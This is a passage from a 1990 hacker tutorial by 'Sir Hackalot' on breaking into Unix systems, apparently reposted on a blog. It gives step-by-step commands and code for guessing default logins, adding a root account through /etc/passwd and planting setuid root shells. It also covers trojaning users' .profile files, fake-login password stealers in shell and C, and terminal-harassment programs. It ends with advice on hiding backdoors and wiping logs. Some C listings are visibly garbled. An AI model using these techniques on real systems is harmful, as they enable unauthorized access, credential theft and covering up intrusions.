the permissions line. Now, theowner of the directory (sirhack) can read from the directory, write in thedirectory, and execute programs from the directory. The root group and every-one else can only read from the directory, and execute off the directory.So, If I changed the directory to be executable only, this iswhat it would look like: $ chmod go-r $ ls drwx--x--x sirhack root 342 March 11 srcNow, if someone went into the directory besides "sirhack", they could onlyexecute programs in the directory. If they did an "ls" to get a directoryof src, when they were inside src, it would say "cannot read directory".If there is a file that is readable in the directory, but the directory isnot readable, it is sometimes possible to read the file anyway.If you do not have execute permissions in a directory, you won't be able toexecute anything in the directory, most of the time._____________________________________________________________________________--------------Hacking:-------------- The first step in hacking a UNIX is to get into the operating systemby finding a valid account/password. The object of hacking is usually toget root (full privileges), so if you're lucky enough to get in as root,you need not read anymore of this hacking phile , and get into the"Having Fun" Section. Hacking can also be just to get other's accounts also.Getting IN---------- The first thing to do is to GET IN to the Unix. I mean, get pastthe login prompt. That is the very first thing. When you come across a UNIX,sometimes it will identify itself by saying something like,"Young INC. Company UNIX"or Just"Young Inc. Please login" Here is where you try the defaults I listed. If you get in with thoseyou can get into the more advanced hacking (getting root). If you do somethingwrong at login, you'll get the message"login incorrect"This was meant to confuse hackers, or keep the wondering. Why?Well, you don't know if you've enterred an account that does not exist, or onethat does exist, and got the wrong password. If you login as root and it says"Not on Console", you have a problem. You have to login as someone else,and use SU to become root. Now, this is where you have to think. If you cannot get in with adefault, you are obviously going to have to find something else tologin as. Some systems provide a good way to do this by allowing the useof command logins. These are ones which simply execute a command, thenlogoff. However, the commands they execute are usually useful. For instancethere are three common command logins that tell you who is online at thepresent time. They are: who rwho finger If you ever successfully get one of these to work, you can write downthe usernames of those online, and try to logon as them. Lots of unsuspectingusers use there login name as their password. For instance, the user"bob" may have a password named "bob" or "bob1". This, as you know, isnot smart, but they don't expect a hacking spree to be carried out onthem. They merely want to be able to login fast. If a command login does not exist, or is not useful at all, you willhave to brainstorm. A good thing to try is to use the name of the unixthat it is identified as. For instance, Young INC's Unix may have an accountnamed "young" Young, INC. Please Login. login: young UNIX SYSTEM V REL 3.2 (c)1984 AT&T.. .. .. .. Some unixes have an account open named "test". This is also a default,but surprisingly enough, it is sometimes left open. It is good to try touse it. Remember, brainstorming is the key to a unix that has no apparentdefaults open. Think of things that may go along with the Unix. typein stuff like "info", "password", "dial", "bbs" and other things thatmay pertain to the system. "att" is present on some machines also.ONCE INSIDE -- SPECIAL FILES---------------------------- There are several files that are very important to the UNIXenvironment. They are as follows:/etc/passwd - This is probably the most important file on a Unix. Why? well, basically, it holds the valid usernames/passwords. This is important since only those listed in the passwd file can login, and even then some can't (will explain). The format for the passwordfile is this:username:password:UserID:GroupID:description(or real name):homedir:shell Here are two sample entries:sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/shdemo::101:100:Test Account:/usr/demo:/usr/sh In the first line, sirhack is a valid user. The second field, however, is supposed to be a password, right? Well, it is, but it's encrypted with the DES encryption standard. the part that says "&a,Ty" may include a date after the comma (Ty) that tells unix when the password expires. Yes, the date is encrypted into two alphanumeric characters (Ty). In the Second example, the demo account has no password. so at Login, you could type in:login: demoUNIX system V(c)1984 AT&T.... But with sirhack, you'd have to enter a password. Now, the password file is great, since a lot of times, you;ll be able to browse through it to look for unpassworded accounts. Remember that some accounts can be restricted from logging in, as such:bin:*:2:2:binaccount:/bin:/bin/sh The '*' means you won't be able to login with it. Your only hope would be to run an SUID shell (explained later). A note about the DES encryption: each unix makes its own unique"keyword" to base encryption off of. Most of the time its just random lettersand numbers. Its chosen at installation time by the operating system. Now, decrypting DES encrypted things ain't easy. Its pretty muchimpossible. Especially decrypting the password file (decrypting the passwordfield within the password file to be exact). Always beware a hacker whosays he decrypted a password file. He's full of shit. Passwords arenever decrypted on unix, but rather, a system call is made to a functioncalled "crypt" from within the C language, and the string you enter asthe password gets encrypted, and compared to the encrypted password. Ifthey match, you're in. Now, there are password hackers, but they donotdecrypt the password file, but rather, encrypt words from a dictionaryand try them against every account (by crypting/comparing) until it findsa match (later on!). Remember, few, if none, have decrypted the passwordfile successfuly./etc/group - This file contains The valid groups. The group file is usually defined as this: groupname:password:groupid:users in group Once again, passwords are encrypted here too. If you see a blank in the password entry you can become part of that group by using the utility "newgrp". Now, there are some cases in which even groups with no password will allow only certain users to be assigned to the group via the newgrp command. Usually, if the last field is left blank, that means any user can use newgrp to get that group's access. Otherwise, only the users specified in the last field can enter the group via newgrp. Newgrp is just a program that will change your group current group id you are logged on under to the one you specify. The syntax for it is: newgrp groupname Now, if you find a group un passworded, and use newgrp to enter it, and it asks for a password, you are not allowed to use the group. I will explain this further in The "SU & Newgrp" section./etc/hosts - this file contains a list of hosts it is connected to thru a hardware network (like an x.25 link or something), or sometimes just thru UUCP. This is a good file when you are hacking a large network, since it tells you systems you can use with rsh (Remote Shell, not restricted shell), rlogin, and telnet, as well as other ethernet/x.25 link programs./usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in Several directories, but it is usually in /usr/adm. This file is what it sounds like. Its a log file, for the program SU. What it is for is to keep a record of who uses SU and when. whenever you use SU, your best bet would be to edit this file if possible, and I'll tell you how and why in the section about using "su"./usr/adm/loginlogor /usr/adm/acct/loginlog - This is a log file, keeping track of the logins. Its purpose is merely for accounting and "security review". Really, sometimes this file is never found, since a lot of systems keep the logging off./usr/adm/errlogor errlog - This is the error log. It could be located anywhere. It keeps track of all serious and even not so serious errors. Usually, it will contain an error code, then a situation. the error code can be from 1-10, the higher the number, the worse the error. Error code 6 is usually used when you try to hack. "login" logs your attempt in errlog with error code 6. Error code 10 means, in a nutshell, "SYSTEM CRASH"./usr/adm/culog - This file contains entries that tell when you used cu, where you called and so forth. Another security thing./usr/mail/ - this is where the program "mail" stores its mail. to read a particular mailbox, so they are called, you must be that user, in the user group "mail" or root. each mailbox is just a name. for instance, if my login was "sirhack" my mail file would usually be: /usr/mail/sirhack/usr/lib/cron/crontabs - This contains the instructions for cron, usually. Will get into this later./etc/shadow - A "shadowed" password file. Will talk about this later.-- The BIN account -- Well, right now, I'd like to take a moment to talk about the account"bin". While it is only a user level account, it is very powerful. It isthe owner of most of the files, and on most systems, it owns /etc/passwd,THE most important file on a unix. See, the bin account owns most of the"bin" (binary) files, as well as others used by the binary files, suchas login. Now, knowing what you know about file permissions, if bin ownsthe passwd file, you can edit passwd and add a root entry for yourself.You could do this via the edit command:$ ed passwd10999 [The size of passwd varies]* asirhak::0:0:Mr. Hackalot:/:/bin/sh{control-d}* w* q$Then, you could say: exec login, then you could login as sirhack, andyou'd be root./\/\/\/\/\/\/\/\/Hacking........../\/\/\/\/\/\/\/\/--------------Account Adding-------------- There are other programs that will add users to the system, insteadof ed. But most of these programs will NOT allow a root level user to beadded, or anything less than a UID of 100. One of these programs isnamed "adduser". Now, the reason I have stuck this little section in, isfor those who want to use a unix for something useful. Say you want a"mailing address". If the unix has uucp on it, or is a big college,chances are, it will do mail transfers. You'll have to test the unixby trying to send mail to a friend somewhere, or just mailing yourself.If the mailer is identified as "smail" when you mail yourself (the programname will be imbedded in the message) that probably means that the systemwill send out UUCP mail. This is a good way to keep in contact with people.Now, this is why you'd want a semi-permanent account. The way to achieve thisis by adding an account similar to those already on the system. If all theuser-level accounts (UID >= 100) are three letter abbriviations, say"btc" for Bill The Cat, or "brs" for bill ryan smith, add an accountvia adduser, and make a name like sally jane marshall or something(they don't expect hackers to put in female names) and have the accountnamed sjm. See, in the account description (like Mr. Hackalot above), thatis where the real name is usually stored. So, sjm might look like this: sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/shOf course, you will password protect this account, right?Also, group id's don't have to be above 100, but you must put the accountinto one that exists. Now, once you login with this account, the firstthing you'd want to do is execute "passwd" to set a password up. If youdon't, chances are someone else 'll do it for you (Then you'll be SOL).-------------------Set The User ID------------------- This is porbably one of the most used schemes. Setting up an "UID-Shell". What does this mean? Well, it basically means you are goingto set the user-bit on a program. The program most commonly used isa shell (csh,sh, ksh, etc). Why? Think about it: You'll have accessto whatever the owner of the file does. A UID shell sets the user-ID ofthe person who executes it to the owner of the program. So if rootowns a uid shell, then you become root when you run it. This is analternate way to become root. Say you get in and modify the passwd file and make a root levelaccount unpassworded, so you can drop in. Of course, you almost HAVE toget rid of that account or else it WILL be noticed eventually. So, whatyou would do is set up a regular user account for yourself, then, makea uid shell. Usually you would use /bin/sh to do it. After addingthe regular user to the passwd file, and setting up his home directory,you could do something like this:(assume you set up the account: shk) # cp /bin/sh /usr/shk/runme # chmod a+s /usr/shk/runmeThats all there would be to it. When you logged in as shk, you could justtype in: $ runme #See? You'd then be root. Here is a thing to do:$ iduid=104(shk) gid=50(user)$ runme# iduid=104(shk) gid=50(user) euid=0(root)#The euid is the "effective" user ID. UID-shells only set the effectiveuserid, not the real user-id. But, the effective user id over-rides thereal user id. Now, you can, if you wanted to just be annoying, makethe utilities suid to root. What do I mean? For instance, make 'ls'a root 'shell'. :# chmod a+s /bin/ls# exit$ ls -l /usr/fred........etc crapLs would then be able to pry into ANY directory. If you did the same to"cat" you could view any file. If you did it to rm, you could delete anyfile. If you did it to 'ed', you could edit any-file (nifty!), anywhere onthe system (usually).How do I get root?------------------ Good question indeed. To make a program set the user-id shell to root,you have to be root, unless you're lucky. What do I mean? Well, sayyou find a program that sets the user-id to root. If you have accessto write to that file, guess what? you can copy over it, but keepthe uid bit set. So, say you see that the program chsh is settingthe user id too root. You can copy /bin/sh over it.$ ls -lrwsrwsrws root other 10999 Jan 4 chsh$ cp /bin/sh chsh$ chsh#See? That is just one way. There are others, which I will now talkabout.More on setting the UID----------------------- Now, the generic form for making a program set the User-ID bitis to use this command:chmod a+s fileWhere 'file' is a valid existing file. Now, only those who own the filecan set the user ID bit. Remember, anything YOU create, YOU own, so ifyou copy th /bin/sh, the one you are logged in as owns it, or IF theUID is set to something else, the New UID owns the file. This bringsme to BAD file permissions.II. HACKING : Bad Directory Permissions Now, what do I mean for bad directory permissions? Well, look forfiles that YOU can write to, and above all, DIRECTORIES you can write to.If you have write permissions on a file, you can modify it. Now, this comesin handy when wanting to steal someone's access. If you can write toa user's .profile, you are in business. You can have that user's .profilecreate a suid shell for you to run when You next logon after the user.If the .profile is writable to you, you can do this:$ ed .profile[some number will be here]? acp /bin/sh .runmechmod a+x .runmechmod a+s .runme(control-d)? w[new filesize will be shown]? q$ Now, when the user next logs on, the .profile will create .runme which will set your ID to the user whose .profile you changed. Ideally, you'll go back in and zap those lines after the suid is created, and you'll create a suid somewhere else, and delete the one in his dir. The .runme will not appear in the user's REGULAR directory list, it will only show up if he does "ls -a" (or ls with a -a combination), because, the '.' makes a file hidden.The above was a TROJAN HORSE, which is one of the most widely used/abusedmethod of gaining more power on a unix. The above could be done in C viathe system() command, or by just plain using open(), chmod(), and the like.* Remember to check and see if the root user's profile is writeable ** it is located at /.profile (usually) * The BEST thing that could happen is to find a user's directory writeable by you. Why? well, you could replace all the files in the directory with your own devious scripts, or C trojans. Even if a file is not writeable by you, you can still overwrite it by deleteing it. If you can read various files, such as the user's .profile, you can make a self deleting trojan as so: $ cp .profile temp.pro $ ed .profile 1234 ? a cp /bin/sh .runme chmod a+x .runme chmod a+s .runme mv temp.pro .profile (control-d) ? w [another number] ? q $ chown that_user temp.pro What happens is that you make a copy of the .profile before you change it. Then, you change the original. When he runs it, the steps are made, then the original version is placed over the current, so if the idiot looks in his .profile, he won't see anything out of the ordinary, except that he could notice in a long listing that the change date is very recent, but most users are not paranoid enough to do extensive checks on their files, except sysadm files (such as passwd). Now, remember, even though you can write to a dir, you may not be able to write to a file without deleting it. If you do not have write perms for that file, you'll have to delete it and write something in its place (put a file with the same name there). The most important thing to remember if you have to delete a .profile is to CHANGE the OWNER back after you construct a new one (hehe) for that user. He could easily notice that his .profile was changed and he'll know who did it. YES, you can change the owner to someone else besides yourself and the original owner (as to throw him off), but this is not wise as keeping access usually relies on the fact that they don't know you are around. You can easily change cron files if you can write to them. I'm not going to go into detail about cronfile formats here, just find the crontab files and modify them to create a shell somewhere as root every once in a while, and set the user-id.III. Trojan Horses on Detached terminals. Basically this: You can send garbage to a user's screen and mess him up bad enough to force a logoff, creating a detached account. Then you can execute a trojan horse off that terminal in place of login or something, so the next one who calls can hit the trojan horse. This USUALLY takes the form of a fake login and write the username/pw entererred to disk. Now, there are other trojan horses available for you to write. Now, don't go thinking about a virus, for they don't work unless ROOT runs them. Anyway, a common trjan would be a shell script to get the password, and mail it to you. Now, you can replace the code for the self deleting trojan with one saying something like: echo "login: \c" read lgin echo off (works on some systems) (if above not available...: stty -noecho) echo "Password:\c" read pw echo on echo "Login: $lgin - Pword: $pw" mail you Now, the best way to use this is to put it in a seperate script file so it can be deleted as part of the self deleting trojan. A quick modification, removing the "login: " and leaving the password may have it look like SU, so you can get the root password. But make sure the program deletes itself. Here is a sample trojan login in C: #include /* Get the necessary defs.. */ main() { char *name[80]; char *pw[20]; FILE *strm; printf("login: "); gets(name); pw = getpass("Password:"); strm = fopen("/WhereEver/Whateverfile","a"); fprintf(strm,"User: (%s), PW [%s]\n",name,pw); fclose(strm); /* put some kind of error below... or something... */ printf("Bus Error - Core Dumped\n"); exit(1); } The program gets the login, and the password, and appends it to a file (/wherever/whateverfile), and creates the file if it can, and if its not there. That is just an example. Network Annoyances come later. IV. Odd systems There may be systems you can log in to with no problem, and find someslack menu, database, or word processor as your shell, with no way to thecommand interpreter (sh, ksh, etc..). Don't give up here. Some systems willlet you login as root, but give you a menu which will allow you to add anaccount. However, ones that do this usually have some purchased softwarepackage running, and the people who made the software KNOW that the peoplewho bought it are idiots, and the thing will sometimes only allow you toadd accounts with user-id 100 or greater, with their special menushell asa shell. You probably won't get to pick the shell, the program will probablystick one on the user you created which is very limiting. HOWEVER, sometimesyou can edit accounts, and it will list accounts you can edit on the screen.HOWEVER, these programs usually only list those with UIDS > 100 so you don'tedit the good accounts, however, they donot stop you from editing an accountwith a UID < uid="100(sirhack)" gid="100(users)">: /etc/passwd (you see: ) root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh ...Now I have found an account to take over! "datawiz" will get me in with notrouble, then I can change his password, which he will not like at all.Some systems leave "sysadm" unpassworded (stupid!), and now, Most versionsof Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell whichwill menu drive all the important shit, even creating users, but you musthave ansi or something. You can usually tell when you'll get a menu. Sometimes on UNIX SYSTEM V, when it says TERM = (termtype), and is waiting for you to press return or whatever, you will probably get a menu.. ack.V. Shadowed Password files Not much to say about this. all it is, is when every password field in the password file has an "x" or just a single character. What that does is screw you, becuase you cannot read the shadowed password file, only root can, and it contains all the passwords, so you will not know what accounts have no passwords, etc.There are a lot of other schemes for hacking unix, lots of others, fromwriting assembly code that modifies the PCB through self-changing code whichthe interrupt handler doesn't catch, and things like that. However, I donot want to give away everything, and this was not meant for advanced UnixHackers, or atleast not the ones that are familiar with 68xxx, 80386 Unixassembly language or anything. Now I will Talk about Internet.--->>> InterNet <<<--- Why do I want to talk about InterNet? Well, because it is a primeexample of a TCP/IP network, better known as a WAN (Wide-Area-Network).Now, mainly you will find BSD systems off of the Internet, or SunOS, forthey are the most common. They may not be when System V, Rel 4.0, Version2.0 comes out. Anyway, these BSDs/SunOSs like to make it easy to jumpfrom one computer to another once you are logged in. What happens isEACH system has a "yello page password file". Better known as yppasswd.If you look in there, and see blank passwords you can use rsh, rlogin, etc..to slip into that system. One system in particular I came across had aa yppasswd file where *300* users had blank passwords in the Yellow Pages.Once I got in on the "test" account, ALL I had to do was select who I wantedto be, and do: rlogin -l user (sometimes -n). Then it would log me ontothe system I was already on, through TCP/IP. However, when you do this,remember that the yppasswd only pertains to the system you are on atthe time. To find accounts, you could find the yppasswd file and do:% cat yppasswd grep ::Or, if you can't find yppasswd..% ypcat passwd grep ::On ONE system (which will remain confidential), I found the DAEMON accountleft open in the yppasswd file. Not bad. Anyway, through one systemon the internet, you can reach many. Just use rsh, or rlogin, and lookin the file: /etc/hosts for valid sites which you can reach. If you geton to a system, and rlogin to somewhere else, and it asks for a password,that just means one of two things:A. Your account that you have hacked on the one computer is on the target computer as well. Try to use the same password (if any) you found the hacked account to have. If it is a default, then it is definitly on the other system, but good luck...B. rlogin/rsh passed your current username along to the remote system, so it was like typing in your login at a "login: " prompt. You may not exist on the other machine. Try "rlogin -l login_name", or rlogin -n name.. sometimes, you can execute "rwho" on another machine, and get a valid account.Some notes on Internet servers. There are "GATEWAYS" that you can get intothat will allow access to MANY internet sites. They are mostly run offa modified GL/1 or GS/1. No big deal. They have help files. However,you can get a "privilged" access on them, which will give you CONTROL ofthe gateway.. You can shut it down, remove systems from the Internet, etc..When you request to become privileged, it will ask for a password. There isa default. The default is "system". I have come across *5* gateways withthe default password. Then again, DECNET has the same password, and I havecome across 100+ of those with the default privileged password. CERT Sucks.a Gateway that led to APPLE.COM had the default password. Anyone couldhave removed apple.com from the internet. Be advised that there are manynetworks now that use TCP/IP.. Such as BARRNET, LANET, and many otherUniversity networks.--** Having Fun **--Now, if nothing else, you should atleast have some fun. No, I do not meango trashing hardrives, or unlinking directories to take up inodes, I meanplay with online users. There are many things to do. Re-direct outputto them is the biggie. Here is an example: $ who loozer tty1 sirhack tty2 $ banner You Suck >/dev/tty1 $ That sent the output to loozer. The TTY1 is where I/O is being performed to his terminal (usually a modem if it is a TTY). You can repetitiously banner him with a do while statement in shell, causing him to logoff. Or you can get sly, and just screw with him. Observe this C program:#include #include #include main(argc,argument)int argc;char *argument[];{ int handle; char *pstr,*olm[80]; char *devstr = "/dev/"; int acnt = 2; FILE *strm; pstr = ""; if (argc == 1) { printf("OL (OneLiner) Version 1.00 \n"); printf("By Sir Hackalot [PHAZE]\n"); printf("\nSyntax: ol tty message\n"); printf("Example: ol tty01 You suck\n"); exit(1); } printf("OL (OneLiner) Version 1.0\n"); printf("By Sir Hackalot [PHAZE]\n"); if (argc == 2) { strcpy(olm,""); printf("\nDummy! You forgot to Supply a ONE LINE MESSAGE\n"); printf("Enter one Here => "); gets(olm); } strcpy(pstr,""); strcat(pstr,devstr); strcat(pstr,argument[1]); printf("Sending to: [%s]\n",pstr); strm = fopen(pstr,"a"); if (strm == NULL) { printf("Error writing to: %s\n",pstr); printf("Cause: No Write Perms?\n"); exit(2); } if (argc == 2) { if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s): \n",logname()); fprintf(strm,"%s\n",olm); fclose(strm); printf("Message Sent.\n"); exit(0); } if (argc > 2) { if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s):\n",logname()); while (acnt <= argc - 1) { fprintf(strm,"%s ",argument[acnt]); acnt++; } fclose(strm); printf("Message sent!\n"); exit(0); }}What the above does is send one line of text to a device writeable by youin /dev. If you try it on a user named "sirhack" it will notify sirhackof what you are doing. You can supply an argument at the command line, orleave a blank message, then it will prompt for one. You MUST supply aTerminal. Also, if you want to use ?, or *, or (), or [], you must notsupply a message at the command line, wait till it prompts you. Example:$ ol tty1 You Suck!OL (OneLiner) Version 1.00by Sir Hackalot [PHAZE]Sending to: [/dev/tty1]Message Sent!$Or..$ ol tty1OL (OneLiner) Version 1.00by Sir Hackalot [PHAZE]Dummy! You Forgot to Supply a ONE LINE MESSAGE!Enter one here => Loozer! Logoff (NOW)!! ^G^GSending to: [/dev/tty1]Message Sent!$ You can even use it to fake messages from root. Here is another:/* * Hose another user */#include #include #include #include #include #include #include #include #define NMAX sizeof(ubuf.ut_name)struct utmp ubuf;struct termio oldmode, mode;struct utsname name;int yn; int loop = 0;char *realme[50] = "Unknown";char *strcat(), *strcpy(), me[50] = "???", *him, *mytty, histty[32];char *histtya, *ttyname(), *strrchr(), *getenv();int signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(), timout();FILE *tf;main(argc, argv)int argc;char *argv[];{ register FILE *uf; char c1, lastc; int goodtty = 0; long clock = time((long *) 0); struct tm *localtime(); struct tm *localclock = localtime( &clock ); struct stat stbuf; char psbuf[20], buf[80], window[20], junk[20]; FILE *pfp, *popen(); if (argc < him =" argv[1];"> 2) histtya = argv[2]; if ((uf = fopen("/etc/utmp", "r")) == NULL) { printf("cannot open /etc/utmp\n"); exit(1); } cuserid(me); if (me == NULL) { printf("Can't find your login name\n"); exit(1); } mytty = ttyname(2); if (mytty == NULL) { printf("Can't find your tty\n"); exit(1); } if (stat(mytty, &stbuf) < histtya =" strrchr(histtya," logcnt="="0)" histtya="="0"> 1) { printf("%s logged more than once\nwriting to %s\n", him, histty+5); } if (access(histty, 0) < tf =" fopen(histty," yn =" 1;" yn ="="" lastc =" '\n';printf(" loop ="="" c1 =" '\b';" i =" fork();" i ="="" i="0;">#include main(argc,argv)char *argv[];int argc;{ int x = 1; char *device = "/dev/"; FILE *histty; if (argc == 1) { printf("Bafoon. Supply a TTY.\n"); exit(1); } strcat(device,argv[1]); /* Make the filename /dev/tty.. */ histty = fopen(device,"a"); if (histty == NULL) { printf("Error opening/writing to tty. Check their perms.\n"); exit(1); } printf("BSV - Backspace virus, By Sir Hackalot.\n"); printf("The Sucker on %s is getting it!\n",device); while (x == 1) { fprintf(histty,"\b\b"); fflush(histty); sleep(5); } }Thats all there is to it. If you can write to their tty, you can use this onthem. It sends two backspaces to them every approx. 5 seconds. Youshould run this program in the background. (&). Here is an example:$ whosirhack tty11loozer tty12$ bsv tty12&[1] 4566BSV - Backspace virus, by Sir HackalotThe Sucker on /dev/tty12 is getting it!$Now, it will keep "attacking" him, until he loggs of, or you kill the process(which was 4566 -- when you use &, it gives the pid [usually]).** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LFmethod to terminate a line. However, the LF terminates a line in Unix.you must STRIP CR's on an ascii upload if you want something you uploadto an editor to work right. Else, you'll see a ^M at the end of everyline. I know that sucks, but you just have to compensate for it.I have a number of other programs that annoy users, but that is enough toget your imagination going, provided you are a C programmer. You can annoyusers other ways. One thing you can do is screw up the user's mailbox.The way to do this is to find a binary file (30k or bigger) on the systemwhich YOU have access to read. then, do this:$ cat binary_file mail loozeror$ mail loozer <>/dev/tty12$It may pause for a while while it outputs it. If you want to resume whatyou were doing instantly, do:$ cat binary_file >/dev/tty12&[1] 4690$And he will probably logoff. You can send the output of anything to histerminal. Even what YOU do in shell. Like this:$ sh >/dev/tty12$You'll get your prompts, but you won't see the output of any commands, hewill...$ ls$ banner Idiot!$ echo Dumbass!$until you type in exit, or hit ctrl-d.There are many many things you can do. You can fake a "write" to someoneand make them think it was from somewhere on the other side of hell. Becreative.When you are looking for things to do, look for holes, or try to getsomeone to run a trojan horse that makes a suid shell. If you getsomeone to run a trojan that does that, you can run the suid, and log theirass off by killing their mother PID. (kill -9 whatever). Or, you canlock them out by adding "kill -1 0" to their .profile. On the subject ofholes, always look for BAD suid bits. On one system thought to be invincibleI was able to read/modify everyone's mail, because I used a mailer that hadboth the GroupID set, and the UserID set. When I went to shell from it,the program instantly changed my Effective ID back to me, so I would not beable to do anything but my regular stuff. But it was not designed to changethe GROUP ID back. The sysop had blundered there. SO when I did an IDI found my group to be "Mail". Mailfiles are readble/writeable by theuser "mail", and the group "mail". I then set up a sgid (set group id) shellto change my group id to "mail" when I ran it, and scanned important mail,and it got me some good info. So, be on the look out for poor permissions.Also, after you gain access, you may want to keep it. Some tips on doing sois: 1. Don't give it out. If the sysadm sees that joeuser logged in 500 times in one night....then.... 2. Don't stay on for hours at a time. They can trace you then. Also they will know it is irregular to have joeuser on for 4 hours after work. 3. Don't trash the system. Don't erase important files, and don't hog inodes, or anything like that. Use the machine for a specific purpose (to leech source code, develop programs, an Email site). Dont be an asshole, and don't try to erase everything you can. 4. Don't screw with users constantly. Watch their processes and run what they run. It may get you good info (snoop!) 5. If you add an account, first look at the accounts already in there If you see a bunch of accounts that are just 3 letter abbrv.'s, then make yours so. If a bunch are "cln, dok, wed" or something, don't add one that is "joeuser", add one that is someone's full initials. 6. When you add an account, put a woman's name in for the description, if it fits (Meaning, if only companies log on to the unix, put a company name there). People do not suspect hackers to use women's names. They look for men's names. 7. Don't cost the Unix machine too much money. Ie.. don't abuse an outdial, or if it controls trunks, do not set up a bunch of dial outs. If there is a pad, don't use it unless you NEED it. 8. Don't use x.25 pads. Their usage is heavily logged. 9. Turn off acct logging (acct off) if you have the access to. Turn it on when you are done. 10. Remove any trojan horses you set up to give you access when you get access. 11. Do NOT change the MOTD file to say "I hacked this system" Just thought I'd tell you. Many MANY people do that, and lose access within 2 hours, if the unix is worth a spit. 12. Use good judgement. Cover your tracks. If you use su, clean up the sulog. 13. If you use cu, clean up the cu_log. 14. If you use the smtp bug (wizard/debug), set up a uid shell. 15. Hide all suid shells. Here's how: goto /usr (or any dir) do: # mkdir ".. " # cd ".. " # cp /bin/sh ".whatever" # chmod a+s ".whatever" The "" are NEEDED to get to the directory .. ! It will not show up in a listing, and it is hard as hell to get to by sysadms if you make 4 or 5 spaces in there (".. "), because all they will see in a directory FULL list will be .. and they won't be able to get there unless they use "" and know the spacing. "" is used when you want to do literals, or use a wildcard as part of a file name. 16. Don't hog cpu time with password hackers. They really don't work well. 17. Don't use too much disk space. If you archieve something to dl, dl it, then kill the archieve. 18. Basically -- COVER YOUR TRACKS.Some final notes:Now, I hear lots of rumors and stories like "It is getting harder to getinto systems...". Wrong. (Yo Pheds! You reading this??). It IS truewhen you are dealing with WAN's, such as telenet, tyment, and the Internet,but not with local computers not on those networks. Here's the story:Over the past few years, many small companies have sprung up as VARs(Value Added Resellers) for Unix and Hardware, in order to make a fastbuck. Now, these companies fast talk companies into buying whatever,and they proceed in setting up the Unix. Now, since they get paid bythe hour usaually when setting one up, they spread it out over days....during these days, the system is WIDE open (if it has a dialin). Getin and add yourself to passwd before the seal it off (if they do..).Then again, after the machine is set up, they leave the defaults on thesystem. Why? The company needs to get in, and most VARs cannot useunix worth a shit, all they know how to do is set it up, and that is ALL.Then, they turn over the system to a company or business that USUALLYhas no-one that knows what they hell they are doing with the thing, exceptwith menus. So, they leave the system open to all...(inadvertedly..),because they are not competant. So, you could usually get on, and createhavoc, and at first they will think it is a bug.. I have seen thishappen ALL to many times, and it is always the same story...The VAR is out for a fast buck, so they set up the software (all they knowhow to do), and install any software packages ordered with it (followingthe step by step instructions). Then they turn it over to the businesswho runs a word processor, or database, or something, un aware that a"shell" or command line exists, and they probably don't even know root does.So, we will see more and more of these pop up, especially since AT&T isnow bundling a version of Xwindows with their new System V, and Simultask...which will lead to even more holes. You'll find systems local to youthat are easy as hell to get into, and you'll see what I mean. TheseVARs are really actually working for us. If a security problem arisesthat the business is aware of, they call the VAR to fix it... Of course,the Var gets paid by the hour, and leaves something open so you'll get inagain, and they make more moolahhhh.You can use this phile for whatever you want. I can't stop you. Justto learn unix (heh) or whatever. But its YOUR ass if you get caught.Always consider the penalties before you attempt something. Sometimesit is not worth it, Sometimes it is.This phile was not meant to be comprehensive, even though it may seem likeit. I have left out a LOT of techniques, and quirks, specifically to getyou to learn SOMETHING on your own, and also to retain information soI will have some secrets. You may pass this file on, UNMODIFIED, to anyGOOD H/P BBS. Sysops can add things to the archieve to say whereit was DL'd from, or to the text viewer for the same purpose. This isCopywrited (haha) by Sir Hackalot, and by PHAZE, in the year 1990.
Subscribe to:
Posts (Atom)